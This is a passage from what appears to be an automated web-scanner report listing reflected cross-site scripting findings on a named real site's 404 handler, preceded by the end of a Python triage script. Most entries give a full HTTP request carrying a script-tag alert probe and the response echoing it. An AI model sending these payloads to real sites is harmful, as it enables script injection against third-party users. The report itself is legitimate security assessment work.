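    """Return the request target if the 404 page echoes it verbatim, else None."""
    target = request_line.split(" ", 2)[1]
    m = ECHO_RE.search(body)
    return target if m and m.group(1) == target else None

def triage(entries):
    """Group report entries (issue id, request line, body) by sink, so that
    per-parameter findings that hit the same 404 handler are counted once."""
    groups = defaultdict(list)
    for issue_id, request_line, body in entries:
        sink = ("404 handler echoes request target"
                if echo_sink(request_line, body) else "other")
        groups[sink].append(issue_id)
    return dict(groups)

# Request lines copied from entries 2.3474, 2.3477 and 2.3479; the bodies are
# constructed with vulnerable_404 to mirror the report's snipped responses.
REQUESTS = {
    "2.3474": "GET /detail599f7<script>alert(1)</script>2c85480efd8/6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1",
    "2.3477": "GET /detail/6/search.php?keyword=search...&Submit3=Searchbb2c8<a>5de352e853c&opt=2 HTTP/1.1",
    "2.3479": "GET /detail/6/search.php?keyword=search...&Submit3=Search&opt=2&22d3e<script>alert(1)</script>6319939b7=1 HTTP/1.1",
}
ENTRIES = [(i, r, vulnerable_404(r.split(" ", 2)[1])) for i, r in REQUESTS.items()]

if __name__ == "__main__":
    target = "/detail/6/search.php?Submit3=Search" + canary(SCRIPT_PROBE)
    print("vulnerable handler, raw bytes:", reflection_state(vulnerable_404(target), SCRIPT_PROBE))
    print("hardened handler, raw bytes:  ", reflection_state(hardened_404(target), SCRIPT_PROBE))
    print("vulnerable handler, browser:  ", reflection_state(vulnerable_404(browser_encode(target)), SCRIPT_PROBE))
    print("entries by sink:", triage(ENTRIES))
```

The three states printed for the same handler are the point of the triage: the scanner's verdict rests on raw bytes reaching the sink, so the retest for a real browser is the percent-encoded request, and the fix is one encoding call in the 404 handler rather than one change per listed parameter.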

2.3478. http://www.resellerbase.com/detail/6/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload af551<a>a5ab12b654a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/search.php?keyword=search...af551<a>a5ab12b654a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/search.php?keyword=search...af551<a>a5ab12b654a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3479. http://www.resellerbase.com/detail/6/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 22d3e<script>alert(1)</script>6319939b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/search.php?keyword=search...&Submit3=Search&opt=2&22d3e<script>alert(1)</script>6319939b7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/search.php?keyword=search...&Submit3=Search&opt=2&22d3e<script>alert(1)</script>6319939b7=1 was not found on this server.</p>
...[SNIP]...

2.3480. http://www.resellerbase.com/detail/6/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload bcb23<a>bc1d8c6ef16 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/search.php?keyword=search...&Submit3=Search&opt=2bcb23<a>bc1d8c6ef16 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/search.php?keyword=search...&Submit3=Search&opt=2bcb23<a>bc1d8c6ef16 was not found on this server.</p>
...[SNIP]...

2.3481. http://www.resellerbase.com/detail/6/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c390<script>alert(1)</script>e05e1678c65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7c390<script>alert(1)</script>e05e1678c65/6/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7c390<script>alert(1)</script>e05e1678c65/6/themes/ was not found on this server.</p>
...[SNIP]...

2.3482. http://www.resellerbase.com/detail/6/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 415a9<script>alert(1)</script>d4385fedfe4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6415a9<script>alert(1)</script>d4385fedfe4/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6415a9<script>alert(1)</script>d4385fedfe4/themes/ was not found on this server.</p>
...[SNIP]...

2.3483. http://www.resellerbase.com/detail/6/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 83842<script>alert(1)</script>86f6fdcb2bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes83842<script>alert(1)</script>86f6fdcb2bb/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes83842<script>alert(1)</script>86f6fdcb2bb/ was not found on this server.</p>
...[SNIP]...

2.3484. http://www.resellerbase.com/detail/6/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 26658<script>alert(1)</script>ceb74d643c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/?26658<script>alert(1)</script>ceb74d643c3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/?26658<script>alert(1)</script>ceb74d643c3=1 was not found on this server.</p>
...[SNIP]...

2.3485. http://www.resellerbase.com/detail/6/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99a32<script>alert(1)</script>5315d9390a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail99a32<script>alert(1)</script>5315d9390a3/6/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail99a32<script>alert(1)</script>5315d9390a3/6/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3486. http://www.resellerbase.com/detail/6/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8c64<script>alert(1)</script>94f2ee4ee41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6f8c64<script>alert(1)</script>94f2ee4ee41/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6f8c64<script>alert(1)</script>94f2ee4ee41/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3487. http://www.resellerbase.com/detail/6/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 75070<script>alert(1)</script>ba6ff3c5621 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes75070<script>alert(1)</script>ba6ff3c5621/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes75070<script>alert(1)</script>ba6ff3c5621/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3488. http://www.resellerbase.com/detail/6/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e461b<script>alert(1)</script>0c1b00f2892 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmose461b<script>alert(1)</script>0c1b00f2892/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmose461b<script>alert(1)</script>0c1b00f2892/ was not found on this server.</p>
...[SNIP]...

2.3489. http://www.resellerbase.com/detail/6/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5aa98<script>alert(1)</script>5d08db7cd5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/?5aa98<script>alert(1)</script>5d08db7cd5e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/?5aa98<script>alert(1)</script>5d08db7cd5e=1 was not found on this server.</p>
...[SNIP]...

2.3490. http://www.resellerbase.com/detail/6/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5f37<script>alert(1)</script>e321d3fdee2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc5f37<script>alert(1)</script>e321d3fdee2/6/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc5f37<script>alert(1)</script>e321d3fdee2/6/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3491. http://www.resellerbase.com/detail/6/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 46483<script>alert(1)</script>a75bce33094 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/646483<script>alert(1)</script>a75bce33094/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/646483<script>alert(1)</script>a75bce33094/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3492. http://www.resellerbase.com/detail/6/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ddaba<script>alert(1)</script>e6875236bb0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themesddaba<script>alert(1)</script>e6875236bb0/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themesddaba<script>alert(1)</script>e6875236bb0/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3493. http://www.resellerbase.com/detail/6/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 13ab0<script>alert(1)</script>d94c6b5884f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos13ab0<script>alert(1)</script>d94c6b5884f/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos13ab0<script>alert(1)</script>d94c6b5884f/images/ was not found on this server.</p>
...[SNIP]...

2.3494. http://www.resellerbase.com/detail/6/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 708d3<script>alert(1)</script>36bbc4b1de1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images708d3<script>alert(1)</script>36bbc4b1de1/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images708d3<script>alert(1)</script>36bbc4b1de1/ was not found on this server.</p>
...[SNIP]...

2.3495. http://www.resellerbase.com/detail/6/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ac81<script>alert(1)</script>e9dda098920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/?5ac81<script>alert(1)</script>e9dda098920=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/?5ac81<script>alert(1)</script>e9dda098920=1 was not found on this server.</p>
...[SNIP]...

2.3496. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79837<script>alert(1)</script>c1a5c6f1d91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail79837<script>alert(1)</script>c1a5c6f1d91/6/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
